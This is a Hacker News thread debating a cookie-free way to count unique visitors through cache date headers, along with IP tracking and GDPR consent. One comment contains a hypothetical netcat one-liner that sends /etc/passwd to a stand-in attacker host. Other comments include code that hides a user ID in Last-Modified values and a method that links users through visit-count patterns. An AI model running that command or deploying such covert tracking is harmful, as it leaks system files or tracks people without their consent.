Using a date-modified header to detect unique visitors without using cookies

dahfizz · on Nov 30, 2022

Threads like this kinda make me sad about HN. Every single comment is about how this technique might possibly be abused to track users in very specific scenarios (i.e. you may be able to identify your most active user).

If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?

Sohcahtoa82 · on Nov 30, 2022

> If a web server wanted to track you, they would just use your IP.

I'd think a HN user would know that using an IP to track isn't effective.

For most home desktop users, at best, it tracks an individual household, not a person. For corporate users and highly privacy-conscious home users, it's probably completely worthless as VPNs will make everyone come from a single IP.

For mobile users, it's completely worthless. You'd be tracking users of a specific WiFi network. If your phone is connecting via IPv4, then who knows who you're tracking, as phones on a mobile network will share an IP address.

ketralnis · on Nov 30, 2022

And if you think VPN users are too obscure a use case to account for, a specific case I've dealt with is (1) all of AOL coming from one IP in Virginia (yes this was a while ago) and (2) almost every university appearing as a single IP (on a website frequented by university students)

mike_d · on Nov 30, 2022

At a previous job we tracked unique visitors to prevent ad fraud. You'd find not only individual IPs with thousands of users behind them, but also larger populations of users numbering in the tens of thousands behind a small block of 8-16 IPs.

The craziest was a large multinational corporation that (I guess for security?) changed their egress IP daily. The first three octets remained the same and the fourth was equal to the day of the month UTC. Really screws things up when you use a 14 day rolling window of previous traffic for comparisons.

jgalt212 · on Nov 30, 2022

As recently as 2006, an entire country was behind a VPN using a single public IP address. If lore can be believed...

https://superuser.com/questions/1013630/why-does-qatar-use-a...

kccqzy · on Nov 30, 2022

Universities do that now? When I was in college, if one connects to the visitor network they'd give you a RFC1918 address with NAT and a restrictive firewall, but if one connects to the regular network and authenticates as a student, they give you a publicly routable IP address.

jesprenj · on Nov 30, 2022

Depends on a lot of factors. The primary school I was a student at had public IPs on every computer, and our national academic and research network operators are encouraging local network operators to avoid private IPs. But the high school at which I'm currently a student has private IP addresses on every computer and a single external IPv4 for the entire facility. It's not so one sided.

lazide · on Nov 30, 2022

Many will also push http/https proxies regardless of IP addressing schemes, so even if one user bypasses it, anyone using defaults will come from whatever the external proxy IP is.

ketralnis · on Nov 30, 2022

I went to a community college that did transparent HTTP proxying with not just deep packet inspection but caching and "security"-oriented javascript injection. Headers would get reordered, and its parser wasn't perfect so multi-line headers would get broken sometimes. They'd inject JS into pages to scan for... something? Other injected JS? I have no idea. But it was impossible to directly connect to another server without going through their proxy even though from the TCP layer it looked like you were. Lots of difficult to debug issues.

lazide · on Nov 30, 2022

Wow, that’s impressively evil. Right up there with the old ‘rewrite DNS traffic’ trick from ISPs.

Any idea what make/model the proxy was?

tonyarkles · on Dec 1, 2022

Oh man, an old employer had one that did the same HTTP header monkeying. I discovered it because it broke, of all things, the C2 wiki. I thought the wiki was down when I sent a link to a coworker but then checked from my home machine (working remote but over Remote Desktop). And then, of course, had to figure out why it would work at home but not at work :D

I believe it was FortiGate but don’t quote me on that.

It also liked to drop idle TCP connections out of its routing table without sending a FIN or RST. HashiCorp Vault, at the time, only used TCP keep-alive and no additional in-band heartbeat mechanism. Naturally, the firewall dropped the idle connection earlier than the default keep-alive interval (which is long…). Additionally, packets sent to an IP-port combo that it didn’t have in its routing table were black holed, without an RST. We had this painful bug to chase where first thing every morning we could read but not write to Vault for a few minutes and then it would work fine for the rest of the day without incident.

I left tcpdump running overnight to see it. At night no one was using Vault… first thing in the morning, the first write goes out on the existing connection (still valid on both sides according to netstat) but just disappears into the ether. It takes a few minutes for the write to time out (while spamming retries), at which point Vault closed the connection and started a new one. I just about flipped the table over.
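For anyone hitting the same kind of middlebox, one generic mitigation is to make keep-alive probes fire well before the firewall forgets the connection. This is only a sketch, not what Vault did or does: the function name and the 60/10/3 values are made up for illustration, the firewall's actual idle timeout isn't given above, and the `TCP_KEEP*` options are platform-specific (they exist on Linux, hence the `getattr` guard).

```python
import socket


def enable_fast_keepalive(sock: socket.socket, idle_s: int = 60,
                          interval_s: int = 10, probes: int = 3) -> None:
    """Turn on TCP keep-alive with a short idle time (hypothetical helper)."""
    # Enable keep-alive probes on this socket at all.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    # Per-socket tunables are not available on every platform, so only set
    # the ones this Python build exposes.
    for name, value in (("TCP_KEEPIDLE", idle_s),      # idle seconds before first probe
                        ("TCP_KEEPINTVL", interval_s),  # seconds between probes
                        ("TCP_KEEPCNT", probes)):       # failed probes before giving up
        option = getattr(socket, name, None)
        if option is not None:
            sock.setsockopt(socket.IPPROTO_TCP, option, value)
```

The idle time has to be shorter than whatever the firewall uses, which you'd have to measure; an in-band heartbeat at the application layer is the more robust fix.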

Edit: and just like that, Twitter delivers https://twitter.com/substitute/status/1597695409903714304?s=...

ketralnis · on Nov 30, 2022

Sadly that's well beyond my memory now. It was pretty formative for me though because I learned a lot of networking and programming and unix stuff so that I could write a TCP-over-HTTP tunnel to a home server just to bypass it. So all in all, great success to be honest.

jesprenj · on Dec 2, 2022

Interesting. There's a Fortinet product as well in our school. I bet it's corruption and some sysadmin is somehow earning money, because it's so obviously unnecessary.

And it's set to block games. Ironically, I tried playing minecraft on a library computer and the server connection succeeded. Worst of all, lichess.org is blocked so students have to compete using their LTE network during chess tournaments.

It shows that we have a part private part state owned company employed as sysadmins in our school. They don't really understand the needs of the school.

bigiain · on Nov 30, 2022

Last time I worked on a project that cared/tracked this (~4 years back), all the prepaid cellular data users from one of the big 4 telcos here ended up on CGNAT and appeared to come from a small pool of 4 IP addresses.

mgbmtl · on Dec 1, 2022

Just use IPv6, and all mobile users will have unique addresses (although they might rotate, and IP tracking is generally not very reliable, as others mentioned).

bawolff · on Nov 30, 2022

I mean, i expect most people who use a vpn to also use incognito mode as well, which i assume would prevent this type of tracking.

nottorp · on Nov 30, 2022

We tend to object to people considering it normal to track us. Regardless of means.

lolinder · on Nov 30, 2022

Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.

MereInterest · on Nov 30, 2022

In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.

In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.

* For each new user, select a random "last-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.

* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.

And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
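A rough sketch of the first bullet, to make the point concrete. Everything here is hypothetical (the function names, the 1985 base date borrowed from the example above, one second per ID); it only shows that a Last-Modified value the browser echoes back as If-Modified-Since can carry an arbitrary integer.

```python
import secrets
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Arbitrary base date, chosen to match the example in the comment above.
BASE = datetime(1985, 1, 1, tzinfo=timezone.utc)


def new_user_id() -> int:
    """Pick a random ID; 10**9 seconds is roughly 31 years of distinct dates."""
    return secrets.randbelow(10**9)


def issue_last_modified(user_id: int) -> str:
    """Hide user_id in a Last-Modified header value, one second per ID."""
    return format_datetime(BASE + timedelta(seconds=user_id), usegmt=True)


def recover_user_id(if_modified_since: str) -> int:
    """Read the ID back out of the If-Modified-Since value the browser sends."""
    echoed = parsedate_to_datetime(if_modified_since)
    return int((echoed - BASE).total_seconds())
```

This is the cookie-equivalent case: the server chooses the value, the cache stores it, and every revalidation hands it back.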

lolinder · on Nov 30, 2022

That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.

"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.

MereInterest · on Nov 30, 2022

I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.

If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.

lolinder · on Nov 30, 2022

This kind of attack isn't new, though, trackers have been using side channel tracking forever now. A quick search shows that this exact side channel tracking vulnerability was discussed in the year 2000 [0].

I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.

[0] http://www.sourcefrog.net/projects/meantime

MereInterest · on Dec 1, 2022

I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.

However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.

1. How would a non-malicious actor implement the proposed system?

2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?

3. What could a malicious actor do with that minimal amount of information?

4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?

Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:

1. As described in the original post.

2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.

3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.

4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.

When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.

xanthine · on Dec 1, 2022

Unrelated: The link to meantime.py on this page is broken, and the correct link is http://sourcefrog.net/projects/meantime/meantime.py

dahfizz · on Dec 1, 2022

Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?

TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.

SkyBelow · on Nov 30, 2022

Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they aren't doing anything else with that information and forgetting it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.

jcuenod · on Nov 30, 2022

It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.

The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.

As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
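Roughly what the sticker counter looks like on the server side, as I read the descriptions in this thread. The article's own code isn't quoted here, so the names, the 1985 base date, and the one-second-per-visit encoding are all assumptions. The server keeps only a tally per visit number and never an ID.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple

BASE = datetime(1985, 1, 1, tzinfo=timezone.utc)  # assumed base date
visits_seen: Counter = Counter()  # visit number -> requests that arrived as that visit


def handle_request(if_modified_since: Optional[str]) -> Tuple[int, str]:
    """Return (visit number, Last-Modified value to send back)."""
    previous = 0  # no header or unreadable header: treat as a first visit
    if if_modified_since is not None:
        try:
            echoed = parsedate_to_datetime(if_modified_since)
            previous = max(0, int((echoed - BASE).total_seconds()))
        except (TypeError, ValueError):
            previous = 0
    current = previous + 1
    visits_seen[current] += 1  # the "sticker colour" handed out this time
    return current, format_datetime(BASE + timedelta(seconds=current), usegmt=True)
```

In this sketch `visits_seen[1]` is the unique-visitor count, and nothing stored on the server says which browser holds which sticker.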

SkyBelow · on Nov 30, 2022

That's still a form of tracking. Maybe not enough to identify unique users in some use cases, but even just knowing someone has been here n times is enough if the user numbers are low enough that you can identify users by unique n counts and patterns of n (such as if one user is at 500 and another is at 490, if the second one is logging in daily while the first one hasn't logged in for a few months, and you see the 490 go 491, 492... when they go from 499 to 500, the chance when a 500 logs on tomorrow and becomes 501 it was the 490 account that has been logging in daily).
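A toy version of that linking argument, assuming the server logs which visit counts it saw on each day (the log format and function name are made up for illustration). When user numbers are low, a run of consecutive counts on consecutive days is very likely one person.

```python
from typing import Dict, List, Set, Tuple


def follow_chain(observations: Dict[int, Set[int]],
                 start_day: int, start_count: int) -> List[Tuple[int, int]]:
    """Follow count n on day d to count n+1 on day d+1 for as long as it continues.

    observations maps a day number to the set of visit counts seen that day.
    """
    chain = [(start_day, start_count)]
    day, count = start_day, start_count
    while count + 1 in observations.get(day + 1, set()):
        day, count = day + 1, count + 1
        chain.append((day, count))
    return chain
```

With many users the chains collide and the inference gets weaker, which is the "if the user numbers are low enough" caveat.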

jcuenod · on Nov 30, 2022

Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.

TeMPOraL · on Nov 30, 2022

That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.

ilyt · on Nov 30, 2022

Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.

You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking user.

lolinder · on Nov 30, 2022

No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:

Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.

Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.

The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
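A minimal sketch of the cookie version, with the HTTP plumbing left out. The class and method names are hypothetical; the only thing taken from above is the cookie itself.

```python
from http.cookies import SimpleCookie
from typing import Optional


class VisitorCounter:
    """Counts first-time visitors without handing anyone an ID."""

    def __init__(self) -> None:
        self.unique_visitors = 0

    def handle(self, cookie_header: str) -> Optional[str]:
        """Take the request's Cookie header; return a Set-Cookie value or None."""
        cookies = SimpleCookie()
        cookies.load(cookie_header)
        if "HAS_BEEN_ON_SITE" in cookies:
            return None  # returning visitor: nothing to count, nothing to set
        self.unique_visitors += 1
        # Every client gets the same value, so the cookie can't tell them apart.
        return "HAS_BEEN_ON_SITE=true"
```

Because the value is identical for everyone, the server learns "seen before or not" and nothing else.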

ilyt · on Nov 30, 2022

Putting cookie like that means consent thingy you need to add tho.

Only ones that you don't need are ones that are expected functionality of the site, like you don't need to put it for shopping basket

lolinder · on Dec 1, 2022

Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.

ilyt · on Dec 1, 2022

Back in my days we called those "tracking pixels" and it didn't even need a cookie.

That's just not a real problem to solve. If you don't want to track users just giving each one unique ID is not a problem if you don't store them for future lookup.

The fact remains that from the client's perspective, the client has no way of telling whether you track them or not, so you can't really prove to the user you're not tracking them.

account42 · on Dec 2, 2022

Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the cache invalidation for tracking does not require any less consent than the equivalent cookie.

However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:

> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.

bawolff · on Nov 30, 2022

Why would it be useless? Just pick a random date for each user.

lolinder · on Nov 30, 2022

I'm not talking about what you could theoretically do with cache headers, I'm talking about what the author of the article is actually doing.

bawolff · on Nov 30, 2022

It's not like that is a far walk though. It's the exact same technique, just storing different data.

Respectfully i feel like this would be like seeing an example of css turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.

lolinder · on Nov 30, 2022

If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"

bawolff · on Dec 1, 2022

The original claim was "technique proposed would in most cases be useless"

Technique does not mean precisely what the person was doing just their method. Their technique has very obvious applications to user tracking.

dahfizz · on Dec 1, 2022

We may as well get rid of HTTPS entirely with that logic! Someone might abuse it, after all...

bawolff · on Dec 1, 2022

People have abused it (e.g. https://arxiv.org/pdf/1810.07304 ) and then it was changed to make it more difficult to abuse.

Ignoring risks does not make them go away, it just makes it easier for bad people to exploit them.

xapata · on Nov 30, 2022

Who's "we"? I don't mind it. I want advertisers to give me more relevant advertising.

dspillett · on Nov 30, 2022

Depends how you define relevant. Since actively trying to block stalky advertising behaviours I've had more interesting adverts (by “interesting” I mean new-to-me, not the “do you want another one of the thing you've already bought all you need of for a while” types). Things are relevant enough if, for instance, I get running related adverts while reading an article about other runners or browsing shoes.

In my experience the stalky behaviour doesn't improve the advertising relevance from my PoV. Meanwhile all that derived information, some of it definitely PII, is out there, so anyone able to hack into it could use it for fraudulent purposes (identity theft, spear-phishing my contacts, …). That makes the situation lose-lose for me.

It is worse for other people, as they have information that advertisers like to derive that might be extra sensitive. Being white, male, cis, middle-class, etc., with a life not interesting enough for there to be much to convincingly blackmail or threaten me about, living in western Europe, I'm pretty safe, but this can't be said for others, especially in certain parts of the world (scarily religious ruled countries with bad records on individual rights, like Qatar and America to give two examples).

xapata · on Nov 30, 2022

I think you're conflating two different kinds of surveillance. The article is incrementing a counter to track the number of unique visitors.

If one is worried about blackmail or violence, especially from a government, then one should take precautions beyond complaining about the prevalence of browser cookies. Modern life, carrying a mobile internet device with GPS service, using a credit card, and going to places with security cameras, presents a variety of surveillance methods.

dspillett · on Dec 1, 2022

I was replying to the, well, the comment I replied to, rather than the counter method that started the thread. That post was anecdata about not minding being tracked, mine was anecdata regarding why I prefer we would not be.

> especially from a government

Were I to live in a regime like I mentioned above, I'd be as worried about vigilantism as government action.

> presents a variety of surveillance methods.

Fair point, but I see a difference between choosing to take a risk and companies trying to follow me around whether I want them to or not. Maybe it is my monkey brain that grew up noticeably before such tech was ubiquitous, said brain having been taught that being followed was at best a bit creepy!

xapata · on Dec 1, 2022

I used to follow the "I should keep everything private!" mantra that so many software engineers keep. Then I took a gig in advertising and realized how much information companies have despite my privacy efforts and learned to "love the bomb" so to speak.

To fight the problems posed by ubiquitous corporate and government surveillance, I suggest ubiquitous public surveillance. Like streamers do, but everywhere, all the time, publicly broadcasted. If I get disappeared, at least it'll be televised.

> vigilantism

There's a difference between being embedded in a supportive community, afraid of violence from outsiders, and being embedded in an antagonistic society, afraid of violence from insiders. In the former, ubiquitous public surveillance might help. In the latter, I think there is nothing to do but emigrate.

mschuster91 · on Nov 30, 2022

I don't want any unsolicited advertising - and I wish our societies would decide to outright ban advertising: Outdoor advertising is a nuisance for the eyes, radio and TV advertising is annoying AF (particularly as it tends to be mixed at a much greater loudness than the program running, my conspiracy theory is that this is done so people are forced to hear it when they go to the loo), paper advertising (e.g. in newspapers, flyers or postal spam) is a waste of paper and online advertising is an insane danger for privacy and a vector for distribution of malware.

Ideally, we'd have independent consumer protection entities, either government or private (e.g. German Stiftung Warentest), that would get products from companies to rank and test, so consumers could make actually informed decisions instead of being lured by hyped up advertising claims.

xapata · on Dec 1, 2022

At the margin, it's very hard to tell the difference between advertisements and other media. Today I listened to an enjoyable podcast with 5 speakers, 2 of whom are employed by the same company. During the episode, they discussed a product that those 2 worked on. Was this an advertisement?

I think any ban like that would have a "I know it when I see it" standard, which isn't wonderful.

nottorp · on Dec 2, 2022

HN is full lately of blog posts about $PROBLEM that end with "incidentally, we're a company that sells a product to solve $PROBLEM".

throwaway0x7E6 · on Nov 30, 2022

we the normal people

xapata · on Dec 1, 2022

Most of us think we're normal, I assume.

dahfizz · on Nov 30, 2022

This is not tracking. Could you explain why you think it is?

fanso99 · on Nov 30, 2022

Storing a cookie with a counter still requires consent afaik. If I am right, then this technique is not sufficiently different and also requires consent.

robertlagrant · on Nov 30, 2022

Why would that require consent?

chriswarbo · on Nov 30, 2022

Consent is always required; even if you just give people a random UUID, with no associated session/etc., that always requires consent.

There is a separate question, of whether consent is implied. If the identifying information is required to provide the user with a service they requested (e.g. a cookie for their online shopping cart), then consent is implied; no need to ask.

Hnrobert42 · on Dec 1, 2022

Giving a random UUID and giving someone a counter is significantly different. This is not identifying and thus does not require consent.

Hnrobert42 · on Dec 1, 2022

I don’t think this would require consent. It is not, as described in the post, uniquely identifying. It is not even pseudonymous. Thus, it is not personal data and does not require consent.

nottorp · on Nov 30, 2022

Could you explain why i should care, considering the current climate online?

When you try to cram a list of 500 "legitimate interests" down my throat, I will consider no interest as legitimate.

No matter what your goals are, you're in an industry that has zero trust these days.

dahfizz · on Nov 30, 2022

Without viable alternatives, sites will continue to use Google Analytics. If people like you fear-monger every alternative, sites will continue to use Google Analytics.

The method described in the article collects no personal data, collects no identifiable data, and is objectively more user-respecting than Google Analytics. But the behavior by people like you will help make sure that these alternatives don't gain traction and Google maintains their monopoly.

ohbtvz · on Nov 30, 2022

But google analytics isn't viable. It's illegal to use in the EU. Here's an explanation by, well, a viable alternative to google analytics: https://matomo.org/blog/2022/05/google-analytics-4-gdpr/

(I don't have a horse in this battle - my personal website doesn't have analytics at all.)

stalfosknight · on Nov 30, 2022

How about we just stop tracking users and hoovering up private data?

EGreg · on Nov 30, 2022

Not only that. The ability to track your own visitors is BUILT INTO how the web operates.

All a site has to do is include analytics in its server-side library. And that’s it. Doesn’t even need CNAME cloaking. It can send the analytics anywhere.

The thing ITP and others try to stop is tracking users ACROSS sites.

But if you use single-sign-on with FB or any other service, they can get your public photo, name and just find you on Facebook thru some search engine that spidered all profiles.

So if you really want to be anonymous, stop using the single sign on and reusing passwords etc.

EGreg · on Nov 30, 2022

I mean, if people wanted to track visitors without cookies, they’d just use etags…

https://www.secjuice.com/etag-entity-tag-tracking/

Has Apple’s ITP closed this particular loophole by ignoring etags in third party iframes and capping them to 7 days etc. ?

It seems browsers will want to restrict ALL first party cookies to 7 days unless the visitor explicitly allows some domain to store their identity.

Frankly speaking, identity can be done better without cookies. Look at Web3 sign-ins, we need something built into the browser and seamless. For now maybe an extension. Then browser makers can have a privacy mode that retires cookies, entirely.

But how are you supposed to do caching without storing and sending identifying data equivalent to cookies?

Thoughts?

fanso99 · on Nov 30, 2022

My understanding is that most commenters are less critical of this specific implementation, but are alarmed by how this new technique could be used by other more nefarious parties in the future.

Counting visits is probably still not a fully GDPR-compliant use case, as the server stores data on the client's machine which is indistinguishable from a cookie containing a counter.

Hnrobert42 · on Dec 1, 2022

IANAL, but I spent a lot of time talking to them about GDPR.

First, this data does not and could not be used, if implemented as described in the post, to uniquely identify someone. As such, it is not personal data and not in scope of GDPR.

Second, DPAs have bigger fish to fry.

account42 · on Dec 2, 2022

I'm pretty sure the police will also have bigger fish to fry than someone who nicks your wallet. But somehow I don't think you'd see that as a good argument for why that behavior shouldn't be accepted.

tinus_hn · on Nov 30, 2022

First, an IP address is considered personal data in the EU.

Second, an IP address is not enough, it may change or be shared. The advertisers ‘need’ to track you forever to serve you relevant ads. So they devise all kinds of tricks to do so.

aardvarkr · on Nov 30, 2022

> First, an IP address is considered personal data in the EU.

I don’t believe that’s true. To my knowledge, GDPR only treats IP address as personal data if it is associated with actual identifying information (like name or address). Collecting IP address alone, and not associating it with anything else, is completely fine (otherwise nginx and apache's default configs would violate GDPR, and through them basically every website would too).

mytailorisrich · on Nov 30, 2022

That's correct. IP addresses are not personal data in themselves but they may become so if further data are collected or accessible which allow to identify individuals when used together with IP addresses.

fanso99 · on Nov 30, 2022

Collecting IP addresses and linking them to a user ID is considered PII as far as I know.

EGreg · on Nov 30, 2022

So the idea is that you can’t legally collect information in private that you can technically collect.

As long as a company is able to keep it a secret, they won’t get caught.

Witness the hundreds of violations of public trust by Facebook:

https://www.independent.co.uk/tech/facebook-app-recording-ca...

The only complete solution is technological!

rzzzt · on Nov 30, 2022

CGNAT complicates matters even further. Sometimes I'm placed way off within <country> if a site tries to go by GeoIP databases, as the provider placed a bunch of households behind a single address.

JohnFen · on Nov 30, 2022

After decades of straight-up abuse by this sector of the industry, including the subversion of countless "privacy respecting" data collection techniques, I think an extraordinary amount of skepticism and suspicion is more than understandable.

kccqzy · on Nov 30, 2022

Why would you put privacy respecting in quotes? The subversion of those techniques is probably just because those techniques are so new and people haven't had better technologies yet.

I personally consider those privacy respecting data collection techniques as a parallel with the development and use of cryptography on the web. In the beginning pretty much no one online used cryptography; later on we started using them but used weak ones ("export" cipher suites for example, or just look at the issues in early protocols like SSL 2.0 or SSL 3.0); nowadays almost everyone uses strong cryptography. Similarly, in the beginning pretty much no one cared about privacy when they did data collection; then we had begun to care more about privacy, but many schemes are easily broken due to for example misguided ideas of anonymization ("anonymization by hashing"), and we are also starting to see the development of newer private information retrieval schemes and differential privacy, etc. Unlike the cynics on this HN thread, I am quite confident that maybe a decade down the road the majority of data collection done by companies will be in a privacy preserving manner. Of course there will be outliers much like there are still websites that don't use https but those will be few and far between.

JohnFen · on Nov 30, 2022

I quoted the term not with the intention of disparaging the notion, but to indicate that I'm referring to a specific class of approaches. That said, the term has also been abused to the point where when it's used, I immediately doubt that it's accurate.

account42 · on Dec 2, 2022

Right, it's like the common "We value your privacy" statement when the real meaning is "we put a value on your privacy and want to collect it".

IshKebab · on Nov 30, 2022

It's not a clever technical trick. It's a pointless technical trick.

You can do exactly the same thing with cookies and they are better for privacy because there's an opt out mechanism. They're how you're supposed to do this sort of thing.

Using a trick like this is no different to cookies in the eyes of the GDPR. So the only reason to use this trick is if you don't want to respect your users' privacy by being able to block cookies.

Hnrobert42 · on Dec 1, 2022

This is significantly different from cookies from a GDPR perspective. This is not uniquely identifying. There is no way for the site to know if you are this user who has visited 100 times or that user who has visited 100 times.

IshKebab · on Dec 1, 2022

No it isn't. Cookies don't have to uniquely identify you.

Just put "visit_count=5" or whatever in a cookie.
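A minimal sketch of that counter-in-a-cookie idea, assuming a server that reads the raw `Cookie` header and writes back a `Set-Cookie` value. The function name `next_visit_cookie` and the `Path=/` attribute are made up for illustration; only the cookie name comes from the comment above.

```python
from http.cookies import SimpleCookie


def next_visit_cookie(cookie_header: str) -> str:
    """Return a Set-Cookie value that bumps a non-identifying visit counter."""
    jar = SimpleCookie()
    jar.load(cookie_header or "")
    try:
        count = int(jar["visit_count"].value) if "visit_count" in jar else 0
    except ValueError:
        count = 0  # treat a malformed or tampered value as a first visit

    out = SimpleCookie()
    out["visit_count"] = str(count + 1)
    out["visit_count"]["path"] = "/"  # assumption: one counter for the whole site
    return out["visit_count"].OutputString()
```

The cookie carries a count and nothing else, so two visitors with the same count are indistinguishable from this header alone.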

mozman · on Nov 30, 2022

Fingerprinting using WebRTC is far more effective. IPs are useless.

zackmorris · on Nov 30, 2022

I think this cache date trick is clever!

There are at least three fallacies with stuff like GDPR that trigger anxiety in people by convincing them that they can somehow safeguard their own privacy while surfing hundreds of websites per day, many in other countries. I'm not going to fully discredit them, just give counterexamples:

1) The internet can continue to work without tracking users

- Targeted advertising (can't have both, although I can't say that I'll miss ads)

2) Users care that companies have their personally identifiable information (PII)

- Users care how companies share and abuse their data for profit (they already know they're being tracked if they don't use something like TorBrowser)

3) Privacy protections actually result in privacy

- PRISM and similar will always find you: https://en.wikipedia.org/wiki/List_of_government_mass_survei...

So I view all of this security theater with utter skepticism. I think the only thing that can maybe save us is transparency. Letting users download their data and using the threat of audit to keep internet companies honest:

https://securiti.ai/blog/dsar-rights-and-compliance/

The rest of the squabbling about "no that's PII, you can't save that!" has only resulted in endless nagging and distraction. It's like trying to hide your address from the post office or thinking that your phone number is secret because it's not in the phonebook.

Although I do think it's kind of funny to make big companies feel like they're living under a police state. They'll work tirelessly to undermine these protections, which is why we'll eventually abandon them like we did with prohibition and McCarthyism because they just aren't enforceable when everyone is breaking the law. Or (equally likely) they'll work to bolster these laws to create new markets through power imbalance, ensuring that only the largest companies can meet compliance and smaller companies pay some sort of protection money against the threat of litigation, which opens the door to mass corruption. Both of these scenarios are ugly enough that I think this entire rabbit hole is suspect.

jefftk · on Nov 30, 2022

I think this is probably illegal in EU countries. The ePrivacy Directive requires consent before storing data on a user's machine that isn't strictly necessary for providing the service the user requested. Analytics isn't "strictly necessary", and ePrivacy doesn't care whether you use the Cookie header or some other method of storage.

I do think this is better for privacy than standard id-based approaches, but the law is very strict. More: https://www.jefftk.com/p/why-so-many-cookie-banners

(Not a lawyer)

Hnrobert42 · on Dec 1, 2022

Here is the ePrivacy Directive. I can’t find anything in it to back up your assertion, though.

https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:32...

jefftk · on Dec 1, 2022

The directive is a bit hard to read, but it's widely understood to require at least notification before storing information on a user's device, probably consent. The guidance is a lot clearer: https://ec.europa.eu/justice/article-29/documentation/opinio...

hyperman1 · on Dec 1, 2022

I'm not sure the guidance applies in this case, as this technique is an edge case which the writers probably didn't foresee.

The ePrivacy directive itself has in article 3.1:

  This Directive shall apply to the processing of personal data [...]

which would mean it doesn't apply here, as there is no personal data.

In practice, I assume this one is for the judges.

yellow_lead · on Nov 30, 2022

Assuming you're correct, can anyone think of a way to count unique visitors without storing data on a user's machine or using identifiable user information? Identifiable user information should include hashes that can be re-computed given the original information.

This isn't a criticism of the law, I'm just curious what options there could be, because I can't think of any.

rattt · on Dec 1, 2022

Something like HyperLogLog might be fine assuming you don't need perfect accuracy.

https://en.wikipedia.org/wiki/HyperLogLog
